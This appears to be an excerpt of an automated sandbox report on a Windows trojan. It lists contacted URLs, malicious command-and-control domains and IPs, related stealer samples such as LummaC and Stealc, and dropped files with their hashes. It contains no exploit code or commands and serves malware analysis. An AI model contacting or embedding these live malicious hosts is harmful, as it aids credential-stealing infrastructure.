https://checkout.steampowered.com/	C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://avatars.fastly.D	C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222059436.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://post-to-me.com/	TN78WX7nJU.exe, 00000000.00000002.4215422078.0000000000A32000.00000004.00000020.00020000.00000000.sdmp, TN78WX7nJU.exe, 00000000.00000003.4091067138.0000000000A32000.00000004.00000020.00020000.00000000.sdmp	false		high
https://wrathful-jammy.cyou/?	C455.tmp.exe, 00000001.00000003.1985854742.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222002497.0000000000B64000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://awake-weaves.cyou/apiH	C455.tmp.exe, 00000001.00000003.1985854742.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222002497.0000000000B64000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://wrathful-jammy.cyou/C	C455.tmp.exe, 00000001.00000003.1985854742.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222002497.0000000000B64000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/;	C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/about/	C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/my/wishlist/	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://deafeninggeh.biz/#	C455.tmp.exe, 00000001.00000003.1941961357.0000000000B62000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://effecterectz.xyz/x	C455.tmp.exe, 00000001.00000003.1941961357.0000000000B62000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://help.steampowered.com/en/	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/market/	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/news/	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://store.steampowered.com/subscriber_agreement/	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222077563.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985978022.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222077563.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985978022.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://recaptcha.net/recaptcha/;	C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	false		high
http://176.113.115.19/_	TN78WX7nJU.exe, 00000000.00000003.1840353767.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/login/home/?goto=profiles%2F7656Z	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/discussions/	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/stats/	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://medal.tv	C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://broadcast.st.dl.eccdnx.com	C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/steam_refunds/	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985908975.0000000000B42000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900	C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/workshop/	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.steampowered.com/	C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/legal/	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222077563.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985978022.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://effecterectz.xyz/4	C455.tmp.exe, 00000001.00000003.1942011120.0000000000B47000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://recaptcha.net	C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.7.dr	false		high
https://effecterectz.xyz/	C455.tmp.exe, 00000001.00000003.1941961357.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1942011120.0000000000B47000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/	C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sordid-snaked.cyou/api~	C455.tmp.exe, 00000001.00000003.1985854742.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222002497.0000000000B64000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png	C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.22.222	immureprech.biz	United States	13335	CLOUDFLARENETUS	false
172.67.179.207	post-to-me.com	United States	13335	CLOUDFLARENETUS	false
104.21.96.1	deafeninggeh.biz	United States	13335	CLOUDFLARENETUS	false
23.55.153.106	steamcommunity.com	United States	20940	AKAMAI-ASN1EU	false
176.113.115.19	unknown	Russian Federation	49505	SELECTELRU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1575131
Start date and time:	2024-12-14 14:11:40 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	TN78WX7nJU.exe renamed because original name is a hash value
Original Sample Name:	e1c246e51c4460e34a3429a6fc397942.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@4/7@11/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 93% Number of executed functions: 43 Number of non-executed functions: 331
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.168.117.173, 20.109.210.53, 20.190.147.12, 13.107.246.63
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
08:12:45	API Interceptor	8565078x Sleep call for process: TN78WX7nJU.exe modified
08:12:58	API Interceptor	2x Sleep call for process: C455.tmp.exe modified
08:13:26	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.22.222	XIaCqh1vRm.exe	Get hash	malicious	LummaC	Browse
	QQx0tdFC0b.exe	Get hash	malicious	LummaC	Browse
	Dqw8QFydEX.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	Loader.exe	Get hash	malicious	LummaC	Browse
	Download-Roblox-Solara.exe	Get hash	malicious	LummaC	Browse
	adv.ps1	Get hash	malicious	LummaC	Browse
	http://gerxx.ru	Get hash	malicious	Unknown	Browse
	https://tdazl.fgfhgjyukh.top/?jul=17Y2Fzc2FuZHJhLmFwbGV5QHRoZXJtb2Zpc2hlci5jb20=	Get hash	malicious	HTMLPhisher	Browse
172.67.179.207	SEejSLAS9f.exe	Get hash	malicious	Stealc	Browse
	EbXj93v3bO.exe	Get hash	malicious	Stealc	Browse
	ssB9bjDQPf.exe	Get hash	malicious	Stealc	Browse
	6X4BIzTTBR.exe	Get hash	malicious	Stealc	Browse
	IeccNv7PP6.exe	Get hash	malicious	Stealc, Vidar	Browse
	XOr3Kqyo9n.exe	Get hash	malicious	Stealc	Browse
	0r9PL33C8E.exe	Get hash	malicious	Stealc	Browse
	Pw2KHOL9Z8.exe	Get hash	malicious	Stealc	Browse
	o3QbCA4xLs.exe	Get hash	malicious	Stealc, Vidar	Browse
	XhYAqi0wi5.exe	Get hash	malicious	Stealc	Browse
104.21.96.1	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	pelisplus.so/administrator/index.php
104.21.96.1	Recibos.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/1a34/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
post-to-me.com	XIaCqh1vRm.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	QQx0tdFC0b.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	LXS5itpTK7.exe	Get hash	malicious	Stealc	Browse	104.21.56.70
	SEejSLAS9f.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	EbXj93v3bO.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	ssB9bjDQPf.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
	ief722WreR.exe	Get hash	malicious	Stealc	Browse	104.21.56.70
	7gxaFDUSOD.exe	Get hash	malicious	Stealc	Browse	104.21.56.70
	YQ3PhY2Aeq.exe	Get hash	malicious	Stealc, Vidar	Browse	104.21.56.70
	6X4BIzTTBR.exe	Get hash	malicious	Stealc	Browse	172.67.179.207
immureprech.biz	XIaCqh1vRm.exe	Get hash	malicious	LummaC	Browse	104.21.22.222
	QQx0tdFC0b.exe	Get hash	malicious	LummaC	Browse	104.21.22.222
	HIDE0RerES.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	Dqw8QFydEX.exe	Get hash	malicious	LummaC	Browse	104.21.22.222
	SET_UP.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.22.222
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.207.38
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	172.67.207.38
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.22.222
	IFTM0g0NWX.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
steamcommunity.com	XIaCqh1vRm.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	QQx0tdFC0b.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	HIDE0RerES.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	Dqw8QFydEX.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	7VfKPMdmiX.exe	Get hash	malicious	Unknown	Browse	23.55.153.106
	7VfKPMdmiX.exe	Get hash	malicious	Unknown	Browse	23.55.153.106
	SET_UP.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	23.55.153.106
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	23.55.153.106
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	23.55.153.106

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	XIaCqh1vRm.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	PqCznDthHP.exe	Get hash	malicious	Edge Stealer	Browse	104.26.13.205
	PO_0099822111ORDER.js	Get hash	malicious	Remcos	Browse	104.21.84.67
	QQx0tdFC0b.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	HIDE0RerES.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	Dqw8QFydEX.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	ORDER - 401.exe	Get hash	malicious	FormBook	Browse	172.67.220.36
	order confirmation.exe	Get hash	malicious	FormBook	Browse	104.21.90.137
	Shipment 990847575203.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	Setup.msi	Get hash	malicious	Unknown	Browse	104.21.58.24
CLOUDFLARENETUS	XIaCqh1vRm.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	PqCznDthHP.exe	Get hash	malicious	Edge Stealer	Browse	104.26.13.205
	PO_0099822111ORDER.js	Get hash	malicious	Remcos	Browse	104.21.84.67
	QQx0tdFC0b.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	HIDE0RerES.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	Dqw8QFydEX.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	ORDER - 401.exe	Get hash	malicious	FormBook	Browse	172.67.220.36
	order confirmation.exe	Get hash	malicious	FormBook	Browse	104.21.90.137
	Shipment 990847575203.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	Setup.msi	Get hash	malicious	Unknown	Browse	104.21.58.24
CLOUDFLARENETUS	XIaCqh1vRm.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	PqCznDthHP.exe	Get hash	malicious	Edge Stealer	Browse	104.26.13.205
	PO_0099822111ORDER.js	Get hash	malicious	Remcos	Browse	104.21.84.67
	QQx0tdFC0b.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	HIDE0RerES.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	Dqw8QFydEX.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	ORDER - 401.exe	Get hash	malicious	FormBook	Browse	172.67.220.36
	order confirmation.exe	Get hash	malicious	FormBook	Browse	104.21.90.137
	Shipment 990847575203.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	Setup.msi	Get hash	malicious	Unknown	Browse	104.21.58.24

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	XIaCqh1vRm.exe	Get hash	malicious	LummaC	Browse	23.55.153.106 104.21.22.222 104.21.96.1
	QQx0tdFC0b.exe	Get hash	malicious	LummaC	Browse	23.55.153.106 104.21.22.222 104.21.96.1
	HIDE0RerES.exe	Get hash	malicious	LummaC	Browse	23.55.153.106 104.21.22.222 104.21.96.1
	Dqw8QFydEX.exe	Get hash	malicious	LummaC	Browse	23.55.153.106 104.21.22.222 104.21.96.1
	SET_UP.exe	Get hash	malicious	LummaC	Browse	23.55.153.106 104.21.22.222 104.21.96.1
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	23.55.153.106 104.21.22.222 104.21.96.1
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	23.55.153.106 104.21.22.222 104.21.96.1
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	23.55.153.106 104.21.22.222 104.21.96.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	23.55.153.106 104.21.22.222 104.21.96.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	23.55.153.106 104.21.22.222 104.21.96.1
37f463bf4616ecd445d4a1937da06e19	XIaCqh1vRm.exe	Get hash	malicious	LummaC	Browse	172.67.179.207
	PO_0099822111ORDER.js	Get hash	malicious	Remcos	Browse	172.67.179.207
	QQx0tdFC0b.exe	Get hash	malicious	LummaC	Browse	172.67.179.207
	7VfKPMdmiX.exe	Get hash	malicious	Unknown	Browse	172.67.179.207
	7VfKPMdmiX.exe	Get hash	malicious	Unknown	Browse	172.67.179.207
	Setup.msi	Get hash	malicious	Unknown	Browse	172.67.179.207
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	172.67.179.207
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	172.67.179.207
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	172.67.179.207
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	172.67.179.207

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\C455.tmp.exe	XIaCqh1vRm.exe	Get hash	malicious	LummaC	Browse
C:\Users\user\AppData\Local\Temp\C455.tmp.exe	QQx0tdFC0b.exe	Get hash	malicious	LummaC	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	XIaCqh1vRm.exe	Get hash	malicious	LummaC	Browse
	QQx0tdFC0b.exe	Get hash	malicious	LummaC	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_C455.tmp.exe_f1f616141224abb4b1d772a683f13d364118c7b3_b072f3df_de633f55-c2b4-4d6b-a9f6-72a94082570a\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9571409124197301
Encrypted:	false
SSDEEP:	96:ZXmrM6OVosth4BP74sfYQXIDcQLc6lcEpcw3lpOUA+HbHg/8BRTf3Oy1E45WAU6t:p5VoXaM0FhTuUhju3RzuiF7Z24IO89
MD5:	73EF102001FD7871FFF876E149D709FC
SHA1:	FCBEAB9B230219882BB1F314AC94BA1E02ACCE2E
SHA-256:	92F5E93493CCA6106BD266C3135C9D8728B08A05F710B6E94B981471C9517786
SHA-512:	3665FC186D228ECCD57994B03877504E8F8D7E5E1F4B66E049818F566F93B2C7DD57BC5DF99F0C7BB56A6A6C2F7EECEAC45CBF8D4B3A955B3678680E80A1BFF6
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.6.5.5.5.8.3.2.8.7.9.0.9.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.6.5.5.5.8.3.7.2.5.4.0.3.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.e.6.3.3.f.5.5.-.c.2.b.4.-.4.d.6.b.-.a.9.f.6.-.7.2.a.9.4.0.8.2.5.7.0.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.b.4.1.1.2.3.4.-.e.d.8.9.-.4.e.7.f.-.9.3.4.5.-.1.9.9.3.6.8.d.8.e.2.3.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.C.4.5.5...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.e.4.-.0.0.0.1.-.0.0.1.4.-.1.c.c.d.-.5.4.d.f.2.9.4.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.2.1.4.b.b.a.d.b.0.e.6.e.c.b.a.0.f.a.6.9.2.6.8.e.d.c.7.d.c.2.9.0.0.0.0.f.f.f.f.!.0.0.0.0.4.a.2.0.9.5.6.9.0.b.a.8.f.1.3.2.5.d.d.1.0.1.6.7.3.1.8.7.2.8.4.4.7.d.1.2.0.5.8.a.!.C.4.5.5...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD1F1.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sat Dec 14 13:13:03 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	45086
Entropy (8bit):	2.540379742070347
Encrypted:	false
SSDEEP:	192:cjN0XZoCHwweOx1BZWyRamgXioRZAoODKj6xScVX23jNFJP4U8o/41:qKoCHwwZTBkyRamsAQoScFWjNP4M/I
MD5:	4DB395753A3C2E05D856B7F0F8593675
SHA1:	6EA62D84D6867F2C27C75D8B6922EC843423DC78
SHA-256:	9470904E6B9F641DA54C8C1075F38A0B3C83D6CBE06F1A6D03D956279A8D29D7
SHA-512:	1D90FB465422E6E563B15F6EF7A122FC955F182D78AC41D4E840285FE6003C4FBF798BE030ED95EFCE517CF88963977243BFF2BD83A9E009D3DEBF58B5143D4A
Malicious:	false
Reputation:	low
